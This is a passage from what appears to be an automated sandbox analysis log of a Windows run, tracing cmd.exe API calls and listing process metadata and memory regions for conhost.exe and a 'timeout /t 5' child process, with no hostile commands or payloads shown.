(_String1="exit", _String2="CLS") returned 2 [0247.596] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0247.597] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0247.597] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0247.597] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0247.597] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0247.597] GetProcessHeap () returned 0x7b0000 [0247.597] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xc) returned 0x7b9580 [0247.597] GetProcessHeap () returned 0x7b0000 [0247.597] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x12) returned 0x7b79d0 [0247.597] exit (_Code=0) Thread: id = 31 os_tid = 0x270 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x18270000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xd20" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 920 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 921 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 922 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 923 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 924 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 925 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 926 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 927 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 928 start_va = 0x7ff7ea130000 end_va = 0x7ff7ea140fff monitored = 0 entry_point = 0x7ff7ea1316b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 929 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 930 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 931 start_va = 0x7ffb2a1f0000 end_va = 0x7ffb2a3d7fff monitored = 0 entry_point = 0x7ffb2a21ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 932 start_va = 0x7ffb2a910000 end_va = 0x7ffb2a9bcfff monitored = 0 entry_point = 0x7ffb2a9281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 933 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 934 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 935 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 936 start_va = 0x7ffb2cd00000 end_va = 0x7ffb2cd9cfff monitored = 0 entry_point = 0x7ffb2cd078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 937 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 938 start_va = 0x6c0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 939 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 940 start_va = 0x7ffb216f0000 end_va = 0x7ffb21748fff monitored = 0 entry_point = 0x7ffb216ffbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 941 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 942 start_va = 0x7ffb2b1d0000 end_va = 0x7ffb2b44cfff monitored = 0 entry_point = 0x7ffb2b2a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 943 start_va = 0x7ffb2ce20000 end_va = 0x7ffb2cf3bfff monitored = 0 entry_point = 0x7ffb2ce602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 944 start_va = 0x7ffb29b30000 end_va = 0x7ffb29b99fff monitored = 0 entry_point = 0x7ffb29b66d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 945 start_va = 0x7ffb2aaa0000 end_va = 0x7ffb2abf5fff monitored = 0 entry_point = 0x7ffb2aaaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 946 start_va = 0x7ffb2a780000 end_va = 0x7ffb2a905fff monitored = 0 entry_point = 0x7ffb2a7cffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 947 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 948 start_va = 0x7ffb2a620000 end_va = 0x7ffb2a762fff monitored = 0 entry_point = 0x7ffb2a648210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 949 start_va = 0x7ffb2cfb0000 end_va = 0x7ffb2d00afff monitored = 0 entry_point = 0x7ffb2cfc38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 950 start_va = 0x7ffb2ac00000 end_va = 0x7ffb2ac3afff monitored = 0 entry_point = 0x7ffb2ac012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 951 start_va = 0x7ffb2b560000 end_va = 0x7ffb2b620fff monitored = 0 entry_point = 0x7ffb2b580da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 952 start_va = 0x7ffb27de0000 end_va = 0x7ffb27f65fff monitored = 0 entry_point = 0x7ffb27e2d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 953 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 954 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 955 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 956 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 957 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 958 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 959 start_va = 0x1e60000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 960 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 961 start_va = 0x7ffb2b7a0000 end_va = 0x7ffb2ccfefff monitored = 0 entry_point = 0x7ffb2b9011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 962 start_va = 0x7ffb2a550000 end_va = 0x7ffb2a592fff monitored = 0 entry_point = 0x7ffb2a564b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 963 start_va = 0x7ffb29ba0000 end_va = 0x7ffb2a1e3fff monitored = 0 entry_point = 0x7ffb29d664b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 964 start_va = 0x7ffb2b6f0000 end_va = 0x7ffb2b796fff monitored = 0 entry_point = 0x7ffb2b7058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 965 start_va = 0x7ffb2a5c0000 end_va = 0x7ffb2a611fff monitored = 0 entry_point = 0x7ffb2a5cf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 966 start_va = 0x7ffb29830000 end_va = 0x7ffb2983efff monitored = 0 entry_point = 0x7ffb29833210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 967 start_va = 0x7ffb2a490000 end_va = 0x7ffb2a544fff monitored = 0 entry_point = 0x7ffb2a4d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 968 start_va = 0x7ffb297e0000 end_va = 0x7ffb2982afff monitored = 0 entry_point = 0x7ffb297e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 969 start_va = 0x7ffb29850000 end_va = 0x7ffb29863fff monitored = 0 entry_point = 0x7ffb298552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 970 start_va = 0x7ffb28160000 end_va = 0x7ffb281f5fff monitored = 0 entry_point = 0x7ffb28185570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 971 start_va = 0x1f00000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 972 start_va = 0x2080000 end_va = 0x23b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 973 start_va = 0x50000 end_va = 0x70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 974 start_va = 0x1e60000 end_va = 0x1eb9fff monitored = 1 entry_point = 0x1e753f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 975 start_va = 0x1ef0000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 976 start_va = 0x23c0000 end_va = 0x25dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 977 start_va = 0x25e0000 end_va = 0x27f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 978 start_va = 0x1f00000 end_va = 0x200afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 979 start_va = 0x2070000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 980 start_va = 0x2800000 end_va = 0x2a12fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 981 start_va = 0x2a20000 end_va = 0x2b2afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 982 start_va = 0x1e60000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 983 start_va = 0x7ffb2ac40000 end_va = 0x7ffb2ad99fff monitored = 0 entry_point = 0x7ffb2ac838e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 984 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 985 start_va = 0x2b30000 end_va = 0x2bebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 986 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 987 start_va = 0x7ffb270a0000 end_va = 0x7ffb270c1fff monitored = 0 entry_point = 0x7ffb270a1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 988 start_va = 0x7ffb27fd0000 end_va = 0x7ffb27fe2fff monitored = 0 entry_point = 0x7ffb27fd2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 989 start_va = 0x7ffb295f0000 end_va = 0x7ffb29645fff monitored = 0 entry_point = 0x7ffb29600bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 990 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 991 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 992 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 993 start_va = 0x710000 end_va = 0x714fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 994 start_va = 0x720000 end_va = 0x720fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 995 start_va = 0x1ea0000 end_va = 0x1ea1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 996 start_va = 0x7ffb20550000 end_va = 0x7ffb207c3fff monitored = 0 entry_point = 0x7ffb205c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 997 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 998 start_va = 0x1ec0000 end_va = 0x1ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Thread: id = 27 os_tid = 0x404 Thread: id = 28 os_tid = 0xf88 Thread: id = 29 os_tid = 0xb04 Thread: id = 30 os_tid = 0xb9c Process: id = "6" image_name = "timeout.exe" filename = "c:\\windows\\syswow64\\timeout.exe" page_root = "0x17fc6000" os_pid = "0x4b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xd20" cmd_line = "timeout /t 5 " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1008 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1009 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1010 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1011 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1012 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1013 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1014 start_va = 0xf0000 end_va = 0xf9fff monitored = 1 entry_point = 0xf4fb0 region_type = mapped_file name = "timeout.exe" filename = "\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe") Region: id = 1015 start_va = 0x100000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1016 start_va = 0x4100000 end_va = 0x4100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004100000" filename = "" Region: id = 1017 start_va = 0x4110000 end_va = 0x4111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 1018 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1019 start_va = 0x77110000 end_va = 0x7728afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1021 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1022 start_va = 0x7fff0000 end_va = 0x7dfb2d1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1023 start_va = 0x7dfb2d1c0000 end_va = 0x7ffb2d1bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb2d1c0000" filename = "" Region: id = 1024 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1025 start_va = 0x7ffb2d381000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb2d381000" filename = "" Region: id = 1026 start_va = 0x45f0000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 1027 start_va = 0x5a1e0000 end_va = 0x5a22ffff monitored = 0 entry_point = 0x5a1f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1028 start_va = 0x5a240000 end_va = 0x5a2b9fff monitored = 0 entry_point = 0x5a253290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1029 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1030 start_va = 0x5a230000 end_va = 0x5a237fff monitored = 0 entry_point = 0x5a2317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1031 start_va = 0x4600000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1032 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1033 start_va = 0x75710000 end_va = 0x7588dfff monitored = 0 entry_point = 0x757c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1034 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1035 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1036 start_va = 0x4120000 end_va = 0x41ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1037 start_va = 0x755c0000 end_va = 0x75706fff monitored = 0 entry_point = 0x755d1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1038 start_va = 0x74a50000 end_va = 0x74b9efff monitored = 0 entry_point = 0x74b06820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1039 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1040 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 1041 start_va = 0x73f10000 end_va = 0x73f6efff monitored = 0 entry_point = 0x73f14af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1042 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1043 start_va = 0x758c0000 end_va = 0x75903fff monitored = 0 entry_point = 0x758d9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1044 start_va = 0x75970000 end_va = 0x75a1cfff monitored = 0 entry_point = 0x75984f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1045 start_va = 0x73e40000 end_va = 0x73e5dfff monitored = 0 entry_point = 0x73e4b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1046 start_va = 0x73e30000 end_va = 0x73e39fff monitored = 0 entry_point = 0x73e32a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1047 start_va = 0x77040000 end_va = 0x77097fff monitored = 0 entry_point = 0x770825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1048 start_va = 0x74a00000 end_va = 0x74a44fff monitored = 0 entry_point = 0x74a1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1049 start_va = 0x75a40000 end_va = 0x75afdfff monitored = 0 entry_point = 0x75a75630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1050 start_va = 0x74400000 end_va = 0x745bcfff monitored = 0 entry_point = 0x744e2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1051 start_va = 0x6d310000 end_va = 0x6d317fff monitored = 0 entry_point = 0x6d3117b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1052 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1053 start_va = 0x4600000 end_va = 0x4787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 1054 start_va = 0x47c0000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 1055 start_va = 0x74990000 end_va = 0x749bafff monitored = 0 entry_point = 0x74995680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1056 start_va = 0x48c0000 end_va = 0x4a40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048c0000" filename = "" Region: id = 1057 start_va = 0x4a50000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a50000" filename = "" Region: id = 1058 start_va = 0x30000 end_va = 0x32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timeout.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\timeout.exe.mui" (normalized: 